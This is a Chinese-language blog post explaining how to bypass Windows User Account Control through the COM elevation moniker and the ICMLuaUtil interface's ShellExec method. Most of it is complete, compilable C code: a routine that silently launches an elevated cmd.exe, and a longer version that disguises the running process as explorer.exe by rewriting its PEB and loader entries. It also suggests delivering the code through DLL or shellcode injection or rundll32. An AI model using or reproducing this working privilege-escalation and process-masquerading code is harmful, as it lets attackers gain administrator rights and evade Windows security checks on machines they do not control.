idiotc4t's blog
搜索文档…
GitBook 提供支持
通过com组件BypassUAC

COM组件简介

COM component(COM组件)是微软公司为了计算机工业的软件生产更加符合人类的行为方式开发的一种新的软件开发技术。在COM构架下,人们可以开发出各种各样的功能专一的组件,然后将它们按照需要组合起来,构成复杂的应用系统。
com组件本质上是二进制文件(dll、exe,在windows系统内),其调用方法与c++的类相似,程序可以通过被称为CLSID(全局标识符)作为索引在注册表内找到具体的二进制文件,这篇文章只会介绍应用方法,具体的逆向分析会在之后的文章内详细解释(等公司买正版ida,现在用的盗版就不拿出来丢人了)。
windows提供了一种com组件提权的方法,其原意大概是为了方便开发,所以当这种提提权方法的调用者是拥有微软签名的合法程序时(其本质是校验PEB),会忽略uac弹窗,这也为了我们利用该技术埋下了隐患。
1
HRESULT CoCreateInstanceAsAdmin(HWND hwnd, REFCLSID rclsid, REFIID riid, __out void ** ppv)
2
{
3
BIND_OPTS3 bo;
4
WCHAR wszCLSID[50];
5
WCHAR wszMonikerName[300];
6
7
StringFromGUID2(rclsid, wszCLSID, sizeof(wszCLSID)/sizeof(wszCLSID[0]));
8
HRESULT hr = StringCchPrintf(wszMonikerName, sizeof(wszMonikerName)/sizeof(wszMonikerName[0]), L"Elevation:Administrator!new:%s", wszCLSID);
9
if (FAILED(hr))
10
return hr;
11
memset(&bo, 0, sizeof(bo));
12
bo.cbStruct = sizeof(bo);
13
bo.hwnd = hwnd;
14
bo.dwClassContext = CLSCTX_LOCAL_SERVER;
15
return CoGetObject(wszMonikerName, &bo, riid, ppv);
16
}
Copied!
在com组件中,有一个名为ICMLuaUtil的接口,这个接口提供了一个名为ShellExec的方法,顾名思义,可以执行任意传入的命令,如果我们能用提权的ICMLuaUtil接口调用ShellExec,那么我们就能获得一个不受限的管理员令牌。

流程

    1.
    初始化com库
    2.
    创建提升权限的ICMLuaUtil接口
    3.
    调用ICMLuaUtil的ShellExec方法
    4.
    弹出一个高权限的calc(串戏了)。

代码

1
#include "BypassUAC.h"
2
3
HRESULT CoCreateInstanceAsAdmin(HWND hwnd, REFCLSID rclsid, REFIID riid, __out void** ppv)
4
{
5
6
BIND_OPTS3 bo;
7
WCHAR wszCLSID[50];
8
WCHAR wszMonikerName[300];
9
10
StringFromGUID2(rclsid, wszCLSID, sizeof(wszCLSID) / sizeof(wszCLSID[0]));
11
HRESULT hr = StringCchPrintf(wszMonikerName, sizeof(wszMonikerName) / sizeof(wszMonikerName[0]), L"Elevation:Administrator!new:%s", wszCLSID);
12
if (FAILED(hr))
13
return hr;
14
memset(&bo, 0, sizeof(bo));
15
16
bo.cbStruct = sizeof(bo);
17
bo.hwnd = hwnd;
18
bo.dwClassContext = CLSCTX_LOCAL_SERVER;
19
return CoGetObject(wszMonikerName, &bo, riid, ppv);
20
}
21
22
BOOL CMLuaUtilBypassUAC(LPWSTR lpwszExecutable)
23
{
24
HRESULT hr = 0;
25
CLSID clsidICMLuaUtil = { 0 };
26
IID iidICMLuaUtil = { 0 };
27
ICMLuaUtil* CMLuaUtil = NULL;
28
BOOL bRet = FALSE;
29
30
31
CLSIDFromString(CLSID_CMSTPLUA, &clsidICMLuaUtil);
32
IIDFromString(IID_ICMLuaUtil, &iidICMLuaUtil);
33
34
CoCreateInstanceAsAdmin(NULL, clsidICMLuaUtil, iidICMLuaUtil, (PVOID*)(&CMLuaUtil));
35
hr = CMLuaUtil->lpVtbl->ShellExec(CMLuaUtil, lpwszExecutable, NULL, NULL, 0, SW_SHOW);
36
CMLuaUtil->lpVtbl->Release(CMLuaUtil);
37
38
if (GetLastError())
39
{
40
return FALSE;
41
}
42
else {
43
return TRUE;
44
}
45
}
46
47
int main() {
48
CoInitialize(NULL);
49
50
CMLuaUtilBypassUAC((LPWSTR)L"c:\\windows\\system32\\cmd.exe");
51
CoUninitialize();
52
return 0;
53
}
Copied!

利用方法

shellcode&dll注入

把这个代码写成一个dll,然后通过进程注入的方式获得一个合法的进程环境。
shellcode注入和dll注入差不多,只不过注入的具体dll被打成了shellcode,我记得有这么一个开源项目可以做到,原理类似于在dll二进制代码前写一个加载器

rundll32

rundll32是windows提供的一个合法exe,它能把一个单独的dll拉起来成为一个进程,这也起来的进程也被windows视为合法。

伪装进程

原理我之前的文章写过fakecommandline,这篇文章的基础上再添加对ldr的伪装,就能绕过对进程的校验,具体的代码三号学生大佬写过this
1
#include "BypassUAC.h"
2
3
#include <Shobjidl.h>
4
#include <string>
5
#pragma comment(lib, "ntdll.lib")
6
7
#define RTL_MAX_DRIVE_LETTERS 32
8
#define GDI_HANDLE_BUFFER_SIZE32 34
9
#define GDI_HANDLE_BUFFER_SIZE64 60
10
#define GDI_BATCH_BUFFER_SIZE 310
11
12
#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )
13
#ifndef NT_SUCCESS
14
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
15
#endif
16
17
#if !defined(_M_X64)
18
#define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE32
19
#else
20
#define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE64
21
#endif
22
23
typedef ULONG GDI_HANDLE_BUFFER32[GDI_HANDLE_BUFFER_SIZE32];
24
typedef ULONG GDI_HANDLE_BUFFER64[GDI_HANDLE_BUFFER_SIZE64];
25
typedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE];
26
27
typedef struct _UNICODE_STRING {
28
USHORT Length;
29
USHORT MaximumLength;
30
PWSTR Buffer;
31
} UNICODE_STRING;
32
typedef UNICODE_STRING* PUNICODE_STRING;
33
34
35
typedef struct _STRING {
36
USHORT Length;
37
USHORT MaximumLength;
38
PCHAR Buffer;
39
} STRING;
40
typedef STRING* PSTRING;
41
42
typedef struct _CLIENT_ID {
43
HANDLE UniqueProcess;
44
HANDLE UniqueThread;
45
} CLIENT_ID, * PCLIENT_ID;
46
47
typedef struct _CLIENT_ID64 {
48
ULONG64 UniqueProcess;
49
ULONG64 UniqueThread;
50
} CLIENT_ID64, * PCLIENT_ID64;
51
52
typedef struct _LDR_DATA_TABLE_ENTRY_COMPATIBLE {
53
LIST_ENTRY InLoadOrderLinks;
54
LIST_ENTRY InMemoryOrderLinks;
55
union
56
{
57
LIST_ENTRY InInitializationOrderLinks;
58
LIST_ENTRY InProgressLinks;
59
} DUMMYUNION0;
60
PVOID DllBase;
61
PVOID EntryPoint;
62
ULONG SizeOfImage;
63
UNICODE_STRING FullDllName;
64
UNICODE_STRING BaseDllName;
65
union
66
{
67
ULONG Flags;
68
struct
69
{
70
ULONG PackagedBinary : 1; // Size=4 Offset=104 BitOffset=0 BitCount=1
71
ULONG MarkedForRemoval : 1; // Size=4 Offset=104 BitOffset=1 BitCount=1
72
ULONG ImageDll : 1; // Size=4 Offset=104 BitOffset=2 BitCount=1
73
ULONG LoadNotificationsSent : 1; // Size=4 Offset=104 BitOffset=3 BitCount=1
74
ULONG TelemetryEntryProcessed : 1; // Size=4 Offset=104 BitOffset=4 BitCount=1
75
ULONG ProcessStaticImport : 1; // Size=4 Offset=104 BitOffset=5 BitCount=1
76
ULONG InLegacyLists : 1; // Size=4 Offset=104 BitOffset=6 BitCount=1
77
ULONG InIndexes : 1; // Size=4 Offset=104 BitOffset=7 BitCount=1
78
ULONG ShimDll : 1; // Size=4 Offset=104 BitOffset=8 BitCount=1
79
ULONG InExceptionTable : 1; // Size=4 Offset=104 BitOffset=9 BitCount=1
80
ULONG ReservedFlags1 : 2; // Size=4 Offset=104 BitOffset=10 BitCount=2
81
ULONG LoadInProgress : 1; // Size=4 Offset=104 BitOffset=12 BitCount=1
82
ULONG LoadConfigProcessed : 1; // Size=4 Offset=104 BitOffset=13 BitCount=1
83
ULONG EntryProcessed : 1; // Size=4 Offset=104 BitOffset=14 BitCount=1
84
ULONG ProtectDelayLoad : 1; // Size=4 Offset=104 BitOffset=15 BitCount=1
85
ULONG ReservedFlags3 : 2; // Size=4 Offset=104 BitOffset=16 BitCount=2
86
ULONG DontCallForThreads : 1; // Size=4 Offset=104 BitOffset=18 BitCount=1
87
ULONG ProcessAttachCalled : 1; // Size=4 Offset=104 BitOffset=19 BitCount=1
88
ULONG ProcessAttachFailed : 1; // Size=4 Offset=104 BitOffset=20 BitCount=1
89
ULONG CorDeferredValidate : 1; // Size=4 Offset=104 BitOffset=21 BitCount=1
90
ULONG CorImage : 1; // Size=4 Offset=104 BitOffset=22 BitCount=1
91
ULONG DontRelocate : 1; // Size=4 Offset=104 BitOffset=23 BitCount=1
92
ULONG CorILOnly : 1; // Size=4 Offset=104 BitOffset=24 BitCount=1
93
ULONG ChpeImage : 1; // Size=4 Offset=104 BitOffset=25 BitCount=1
94
ULONG ReservedFlags5 : 2; // Size=4 Offset=104 BitOffset=26 BitCount=2
95
ULONG Redirected : 1; // Size=4 Offset=104 BitOffset=28 BitCount=1
96
ULONG ReservedFlags6 : 2; // Size=4 Offset=104 BitOffset=29 BitCount=2
97
ULONG CompatDatabaseProcessed : 1; // Size=4 Offset=104 BitOffset=31 BitCount=1
98
};
99
} ENTRYFLAGSUNION;
100
WORD ObsoleteLoadCount;
101
WORD TlsIndex;
102
union
103
{
104
LIST_ENTRY HashLinks;
105
struct
106
{
107
PVOID SectionPointer;
108
ULONG CheckSum;
109
};
110
} DUMMYUNION1;
111
union
112
{
113
ULONG TimeDateStamp;
114
PVOID LoadedImports;
115
} DUMMYUNION2;
116
//fields below removed for compatibility
117
} LDR_DATA_TABLE_ENTRY_COMPATIBLE, * PLDR_DATA_TABLE_ENTRY_COMPATIBLE;
118
typedef LDR_DATA_TABLE_ENTRY_COMPATIBLE LDR_DATA_TABLE_ENTRY;
119
120
typedef LDR_DATA_TABLE_ENTRY* PCLDR_DATA_TABLE_ENTRY;
121
122
typedef struct _PEB_LDR_DATA {
123
ULONG Length;
124
BOOLEAN Initialized;
125
HANDLE SsHandle;
126
LIST_ENTRY InLoadOrderModuleList;
127
LIST_ENTRY InMemoryOrderModuleList;
128
LIST_ENTRY InInitializationOrderModuleList;
129
PVOID EntryInProgress;
130
BOOLEAN ShutdownInProgress;
131
HANDLE ShutdownThreadId;
132
} PEB_LDR_DATA, * PPEB_LDR_DATA;
133
134
135
typedef struct _CURDIR {
136
UNICODE_STRING DosPath;
137
HANDLE Handle;
138
} CURDIR, * PCURDIR;
139
140
typedef struct _RTL_DRIVE_LETTER_CURDIR {
141
USHORT Flags;
142
USHORT Length;
143
ULONG TimeStamp;
144
STRING DosPath;
145
} RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR;
146
147
148
typedef struct _RTL_USER_PROCESS_PARAMETERS {
149
ULONG MaximumLength;
150
ULONG Length;
151
152
ULONG Flags;
153
ULONG DebugFlags;
154
155
HANDLE ConsoleHandle;
156
ULONG ConsoleFlags;
157
HANDLE StandardInput;
158
HANDLE StandardOutput;
159
HANDLE StandardError;
160
161
CURDIR CurrentDirectory;
162
UNICODE_STRING DllPath;
163
UNICODE_STRING ImagePathName;
164
UNICODE_STRING CommandLine;
165
PVOID Environment;
166
167
ULONG StartingX;
168
ULONG StartingY;
169
ULONG CountX;
170
ULONG CountY;
171
ULONG CountCharsX;
172
ULONG CountCharsY;
173
ULONG FillAttribute;
174
175
ULONG WindowFlags;
176
ULONG ShowWindowFlags;
177
UNICODE_STRING WindowTitle;
178
UNICODE_STRING DesktopInfo;
179
UNICODE_STRING ShellInfo;
180
UNICODE_STRING RuntimeData;
181
RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS];
182
183
ULONG EnvironmentSize;
184
ULONG EnvironmentVersion;
185
PVOID PackageDependencyData; //8+
186
ULONG ProcessGroupId;
187
// ULONG LoaderThreads;
188
} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;
189
190
typedef struct _PEB {
191
BOOLEAN InheritedAddressSpace;
192
BOOLEAN ReadImageFileExecOptions;
193
BOOLEAN BeingDebugged;
194
union
195
{
196
BOOLEAN BitField;
197
struct
198
{
199
BOOLEAN ImageUsesLargePages : 1;
200
BOOLEAN IsProtectedProcess : 1;
201
BOOLEAN IsImageDynamicallyRelocated : 1;
202
BOOLEAN SkipPatchingUser32Forwarders : 1;
203
BOOLEAN IsPackagedProcess : 1;
204
BOOLEAN IsAppContainer : 1;
205
BOOLEAN IsProtectedProcessLight : 1;
206
BOOLEAN IsLongPathAwareProcess : 1;
207
};
208
};
209
HANDLE Mutant;
210
211
PVOID ImageBaseAddress;
212
PPEB_LDR_DATA Ldr;
213
PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
214
PVOID SubSystemData;
215
PVOID ProcessHeap;
216
PRTL_CRITICAL_SECTION FastPebLock;
217
PVOID AtlThunkSListPtr;
218
PVOID IFEOKey;
219
union
220
{
221
ULONG CrossProcessFlags;
222
struct
223
{
224
ULONG ProcessInJob : 1;
225
ULONG ProcessInitializing : 1;
226
ULONG ProcessUsingVEH : 1;
227
ULONG ProcessUsingVCH : 1;
228
ULONG ProcessUsingFTH : 1;
229
ULONG ProcessPreviouslyThrottled : 1;
230
ULONG ProcessCurrentlyThrottled : 1;
231
ULONG ReservedBits0 : 25;
232
};
233
ULONG EnvironmentUpdateCount;
234
};
235
union
236
{
237
PVOID KernelCallbackTable;
238
PVOID UserSharedInfoPtr;
239
};
240
ULONG SystemReserved[1];
241
ULONG AtlThunkSListPtr32;
242
PVOID ApiSetMap;
243
ULONG TlsExpansionCounter;
244
PVOID TlsBitmap;
245
ULONG TlsBitmapBits[2];
246
PVOID ReadOnlySharedMemoryBase;
247
PVOID HotpatchInformation;
248
PVOID* ReadOnlyStaticServerData;
249
PVOID AnsiCodePageData;
250
PVOID OemCodePageData;
251
PVOID UnicodeCaseTableData;
252
253
ULONG NumberOfProcessors;
254
ULONG NtGlobalFlag;
255
256
LARGE_INTEGER CriticalSectionTimeout;
257
SIZE_T HeapSegmentReserve;
258
SIZE_T HeapSegmentCommit;
259
SIZE_T HeapDeCommitTotalFreeThreshold;
260
SIZE_T HeapDeCommitFreeBlockThreshold;
261
262
ULONG NumberOfHeaps;
263
ULONG MaximumNumberOfHeaps;
264
PVOID* ProcessHeaps;
265
266
PVOID GdiSharedHandleTable;
267
PVOID ProcessStarterHelper;
268
ULONG GdiDCAttributeList;
269
270
PRTL_CRITICAL_SECTION LoaderLock;
271
272
ULONG OSMajorVersion;
273
ULONG OSMinorVersion;
274
USHORT OSBuildNumber;
275
USHORT OSCSDVersion;
276
ULONG OSPlatformId;
277
ULONG ImageSubsystem;
278
ULONG ImageSubsystemMajorVersion;
279
ULONG ImageSubsystemMinorVersion;
280
ULONG_PTR ImageProcessAffinityMask;
281
GDI_HANDLE_BUFFER GdiHandleBuffer;
282
PVOID PostProcessInitRoutine;
283
284
PVOID TlsExpansionBitmap;
285
ULONG TlsExpansionBitmapBits[32];
286
287
ULONG SessionId;
288
289
ULARGE_INTEGER AppCompatFlags;
290
ULARGE_INTEGER AppCompatFlagsUser;
291
PVOID pShimData;
292
PVOID AppCompatInfo;
293
294
UNICODE_STRING CSDVersion;
295
296
PVOID ActivationContextData;
297
PVOID ProcessAssemblyStorageMap;
298
PVOID SystemDefaultActivationContextData;
299
PVOID SystemAssemblyStorageMap;
300
301
SIZE_T MinimumStackCommit;
302
303
PVOID* FlsCallback;
304
LIST_ENTRY FlsListHead;
305
PVOID FlsBitmap;
306
ULONG FlsBitmapBits[FLS_MAXIMUM_AVAILABLE / (sizeof(ULONG) * 8)];
307
ULONG FlsHighIndex;
308
309
PVOID WerRegistrationData;
310
PVOID WerShipAssertPtr;
311
PVOID pContextData;
312
PVOID pImageHeaderHash;
313
union
314
{
315
ULONG TracingFlags;
316
struct
317
{
318
ULONG HeapTracingEnabled : 1;
319
ULONG CritSecTracingEnabled : 1;
320
ULONG LibLoaderTracingEnabled : 1;
321
ULONG SpareTracingBits : 29;
322
};
323
};
324
ULONGLONG CsrServerReadOnlySharedMemoryBase;
325
} PEB, * PPEB;
326
327
typedef struct _GDI_TEB_BATCH {
328
ULONG Offset;
329
UCHAR Alignment[4];
330
ULONG_PTR HDC;
331
ULONG Buffer[GDI_BATCH_BUFFER_SIZE];
332
} GDI_TEB_BATCH, * PGDI_TEB_BATCH;
333
334
typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
335
ULONG Flags;
336
PSTR FrameName;
337
} TEB_ACTIVE_FRAME_CONTEXT, * PTEB_ACTIVE_FRAME_CONTEXT;
338
339
typedef struct _TEB_ACTIVE_FRAME {
340
ULONG Flags;
341
struct _TEB_ACTIVE_FRAME* Previous;
342
PTEB_ACTIVE_FRAME_CONTEXT Context;
343
} TEB_ACTIVE_FRAME, * PTEB_ACTIVE_FRAME;
344
345
typedef struct _TEB {
346
NT_TIB NtTib;
347
348
PVOID EnvironmentPointer;
349
CLIENT_ID ClientId;
350
PVOID ActiveRpcHandle;
351
PVOID ThreadLocalStoragePointer;
352
PPEB ProcessEnvironmentBlock;
353
354
ULONG LastErrorValue;
355
ULONG CountOfOwnedCriticalSections;
356
PVOID CsrClientThread;
357
PVOID Win32ThreadInfo;
358
ULONG User32Reserved[26];
359
ULONG UserReserved[5];
360
PVOID WOW32Reserved;
361
LCID CurrentLocale;
362
ULONG FpSoftwareStatusRegister;
363
PVOID SystemReserved1[54];
364
NTSTATUS ExceptionCode;
365
PVOID ActivationContextStackPointer;
366
#if defined(_M_X64)
367
UCHAR SpareBytes[24];
368
#else
369
UCHAR SpareBytes[36];
370
#endif
371
ULONG TxFsContext;
372
373
GDI_TEB_BATCH GdiTebBatch;
374
CLIENT_ID RealClientId;
375
HANDLE GdiCachedProcessHandle;
376
ULONG GdiClientPID;
377
ULONG GdiClientTID;
378
PVOID GdiThreadLocalInfo;
379
ULONG_PTR Win32ClientInfo[62];
380
PVOID glDispatchTable[233];
381
ULONG_PTR glReserved1[29];
382
PVOID glReserved2;
383
PVOID glSectionInfo;
384
PVOID glSection;
385
PVOID glTable;
386
PVOID glCurrentRC;
387
PVOID glContext;
388
389
NTSTATUS LastStatusValue;
390
UNICODE_STRING StaticUnicodeString;
391
WCHAR StaticUnicodeBuffer[261];
392
393
PVOID DeallocationStack;
394
PVOID TlsSlots[64];
395
LIST_ENTRY TlsLinks;
396
397
PVOID Vdm;
398
PVOID ReservedForNtRpc;
399
PVOID DbgSsReserved[2];
400
401
ULONG HardErrorMode;
402
#if defined(_M_X64)
403
PVOID Instrumentation[11];
404
#else
405
PVOID Instrumentation[9];
406
#endif
407
GUID ActivityId;
408
409
PVOID SubProcessTag;
410
PVOID EtwLocalData;
411
PVOID EtwTraceData;
412
PVOID WinSockData;
413
ULONG GdiBatchCount;
414
415
union
416
{
417
PROCESSOR_NUMBER CurrentIdealProcessor;
418
ULONG IdealProcessorValue;
419
struct
420
{
421
UCHAR ReservedPad0;
422
UCHAR ReservedPad1;
423
UCHAR ReservedPad2;
424
UCHAR IdealProcessor;
425
};
426
};
427
428
ULONG GuaranteedStackBytes;
429
PVOID ReservedForPerf;
430
PVOID ReservedForOle;
431
ULONG WaitingOnLoaderLock;
432
PVOID SavedPriorityState;
433
ULONG_PTR SoftPatchPtr1;
434
PVOID ThreadPoolData;
435
PVOID* TlsExpansionSlots;
436
#if defined(_M_X64)
437
PVOID DeallocationBStore;
438
PVOID BStoreLimit;
439
#endif
440
ULONG MuiGeneration;
441
ULONG IsImpersonating;
442
PVOID NlsCache;
443
PVOID pShimData;
444
ULONG HeapVirtualAffinity;
445
HANDLE CurrentTransactionHandle;
446
PTEB_ACTIVE_FRAME ActiveFrame;
447
PVOID FlsData;
448
449
PVOID PreferredLanguages;
450
PVOID UserPrefLanguages;
451
PVOID MergedPrefLanguages;
452
ULONG MuiImpersonation;
453
454
union
455
{
456
USHORT CrossTebFlags;
457
USHORT SpareCrossTebBits : 16;
458
};
459
union
460
{
461
USHORT SameTebFlags;
462
struct
463
{
464
USHORT SafeThunkCall : 1;
465
USHORT InDebugPrint : 1;
466
USHORT HasFiberData : 1;
467
USHORT SkipThreadAttach : 1;
468
USHORT WerInShipAssertCode : 1;
469
USHORT RanProcessInit : 1;
470
USHORT ClonedThread : 1;
471
USHORT SuppressDebugMsg : 1;
472
USHORT DisableUserStackWalk : 1;
473
USHORT RtlExceptionAttached : 1;
474
USHORT InitialThread : 1;
475
USHORT SpareSameTebBits : 1;
476
};
477
};
478
479
PVOID TxnScopeEnterCallback;
480
PVOID TxnScopeExitCallback;
481
PVOID TxnScopeContext;
482
ULONG LockCount;
483
ULONG SpareUlong0;
484
PVOID ResourceRetValue;
485
} TEB, * PTEB;
486
487
typedef VOID(NTAPI* PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION)(
488
_In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry,
489
_In_ PVOID Context,
490
_Inout_ BOOLEAN* StopEnumeration
491
);
492
493
typedef PVOID NTAPI RTLINITUNICODESTRING(
494
_Inout_ PUNICODE_STRING DestinationString,
495
_In_opt_ PCWSTR SourceString
496
);
497
typedef RTLINITUNICODESTRING FAR* LPRTLINITUNICODESTRING;
498
LPRTLINITUNICODESTRING RtlInitUnicodeString;
499
500
typedef NTSTATUS NTAPI RTLENTERCRITICALSECTION(
501
_In_ PRTL_CRITICAL_SECTION CriticalSection
502
);
503
typedef RTLENTERCRITICALSECTION FAR* LPRTLENTERCRITICALSECTION;
504
LPRTLENTERCRITICALSECTION RtlEnterCriticalSection;
505
506
typedef NTSTATUS NTAPI RTLLEAVECRITICALSECTION(
507
_In_ PRTL_CRITICAL_SECTION CriticalSection
508
);
509
typedef RTLLEAVECRITICALSECTION FAR* LPRTLLEAVECRITICALSECTION;
510
LPRTLLEAVECRITICALSECTION RtlLeaveCriticalSection;
511
512
typedef NTSTATUS NTAPI LDRENUMERATELOADEDMODULES(
513
_In_opt_ ULONG Flags,
514
_In_ PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION CallbackFunction,
515
_In_opt_ PVOID Context);
516
typedef LDRENUMERATELOADEDMODULES FAR* LPLDRENUMERATELOADEDMODULES;
517
LPLDRENUMERATELOADEDMODULES LdrEnumerateLoadedModules;
518
519
typedef NTSTATUS NTAPI NTALLOCATEVIRTUALMEMORY(
520
_In_ HANDLE ProcessHandle,
521
_Inout_ PVOID* BaseAddress,
522
_In_ ULONG_PTR ZeroBits,
523
_Inout_ PSIZE_T RegionSize,
524
_In_ ULONG AllocationType,
525
_In_ ULONG Protect
526
);
527
typedef NTALLOCATEVIRTUALMEMORY FAR* LPNTALLOCATEVIRTUALMEMORY;
528
LPNTALLOCATEVIRTUALMEMORY NtAllocateVirtualMemory;
529
530
LPWSTR g_lpszExplorer2 = (LPWSTR)L"C:\\windows\\explorer.exe";
531
532
VOID NTAPI supxLdrEnumModulesCallback(
533
_In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry,
534
_In_ PVOID Context,
535
_Inout_ BOOLEAN* StopEnumeration
536
)
537
{
538
PPEB Peb = (PPEB)Context;
539
540
if (DataTableEntry->DllBase == Peb->ImageBaseAddress) {
541
RtlInitUnicodeString(&DataTableEntry->FullDllName, g_lpszExplorer2);
542
RtlInitUnicodeString(&DataTableEntry->BaseDllName, L"explorer.exe");
543
*StopEnumeration = TRUE;
544
}
545
else {
546
*StopEnumeration = FALSE;
547
}
548
}
549
550
551
__inline struct _PEB* NtCurrentPeb() { return NtCurrentTeb()->ProcessEnvironmentBlock; }
552
553
554
VOID supMasqueradeProcess(
555
VOID
556
)
557
{
558
559
NTSTATUS Status;
560
PPEB Peb = NtCurrentPeb();
561
SIZE_T RegionSize;
562
563
PVOID g_lpszExplorer = NULL;
564
RegionSize = 0x1000;
565
566
Status = NtAllocateVirtualMemory(
567
NtCurrentProcess(),
568
&g_lpszExplorer,
569
0,
570
&RegionSize,
571
MEM_COMMIT | MEM_RESERVE,
572
PAGE_READWRITE);
573
574
if (NT_SUCCESS(Status)) {
575
RtlEnterCriticalSection(Peb->FastPebLock);
576
577
RtlInitUnicodeString(&Peb->ProcessParameters->ImagePathName, g_lpszExplorer2);
578
RtlInitUnicodeString(&Peb->ProcessParameters->CommandLine, g_lpszExplorer2);
579
580
RtlLeaveCriticalSection(Peb->FastPebLock);
581
582
LdrEnumerateLoadedModules(0, &supxLdrEnumModulesCallback, (PVOID)Peb);
583
}
584
}
585
586
HRESULT CoCreateInstanceAsAdmin(HWND hwnd, REFCLSID rclsid, REFIID riid, __out void** ppv)
587
{
588
589
BIND_OPTS3 bo;
590
WCHAR wszCLSID[50];
591
WCHAR wszMonikerName[300];
592
CoInitialize(NULL);
593
StringFromGUID2(rclsid, wszCLSID, sizeof(wszCLSID) / sizeof(wszCLSID[0]));
594
HRESULT hr = StringCchPrintfW(wszMonikerName, sizeof(wszMonikerName) / sizeof(wszMonikerName[0]), L"Elevation:Administrator!new:%s", wszCLSID);
595
if (FAILED(hr))
596
return hr;
597
598
memset(&bo, 0, sizeof(bo));
599
600
bo.cbStruct = sizeof(bo);
601
bo.hwnd = hwnd;
602
bo.dwClassContext = CLSCTX_LOCAL_SERVER;
603
604
return CoGetObject(wszMonikerName, &bo, riid, ppv);
605
}
606
607
BOOL CMLuaUtilBypassUAC(LPWSTR lpwszExecutable)
608
{
609
HRESULT hr = 0;
610
CLSID clsidICMLuaUtil = { 0 };
611
IID iidICMLuaUtil = { 0 };
612
ICMLuaUtil* CMLuaUtil = NULL;
613
BOOL bRet = FALSE;
614
615
616
CLSIDFromString(CLSID_CMSTPLUA, &clsidICMLuaUtil);
617
IIDFromString(IID_ICMLuaUtil, &iidICMLuaUtil);
618
619
CoCreateInstanceAsAdmin(NULL, clsidICMLuaUtil, iidICMLuaUtil, (PVOID*)(&CMLuaUtil));
620
hr = CMLuaUtil->lpVtbl->ShellExec(CMLuaUtil, lpwszExecutable, NULL, NULL, 0, SW_SHOW);
621
622
CMLuaUtil->lpVtbl->Release(CMLuaUtil);
623
624
if (GetLastError())
625
{
626
return FALSE;
627
}
628
else {
629
return TRUE;
630
}
631
}
632
/*
633
int main() {
634
CoInitialize(NULL);
635
636
CMLuaUtilBypassUAC((LPWSTR)L"c:\\windows\\system32\\cmd.exe");
637
CoUninitialize();
638
return 0;
639
}*/
640
VOID main()
641
{
642
NtAllocateVirtualMemory = (LPNTALLOCATEVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAllocateVirtualMemory");
643
RtlEnterCriticalSection = (LPRTLENTERCRITICALSECTION)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlEnterCriticalSection");
644
RtlInitUnicodeString = (LPRTLINITUNICODESTRING)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlInitUnicodeString");
645
RtlLeaveCriticalSection = (LPRTLLEAVECRITICALSECTION)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlLeaveCriticalSection");
646
LdrEnumerateLoadedModules = (LPLDRENUMERATELOADEDMODULES)GetProcAddress(GetModuleHandleA("ntdll.dll"), "LdrEnumerateLoadedModules");
647
supMasqueradeProcess();
648
CMLuaUtilBypassUAC((LPWSTR)L"c:\\windows\\system32\\cmd.exe");
649
//CoUninitialize();
650
651
}
652
Copied!

LINKS

COM 提升名字对象 - Win32 apps
docsmsft
基于COM组件接口ICMLuaUtil的BypassUAC - 自己的小白 - 博客园
最近更新 1yr ago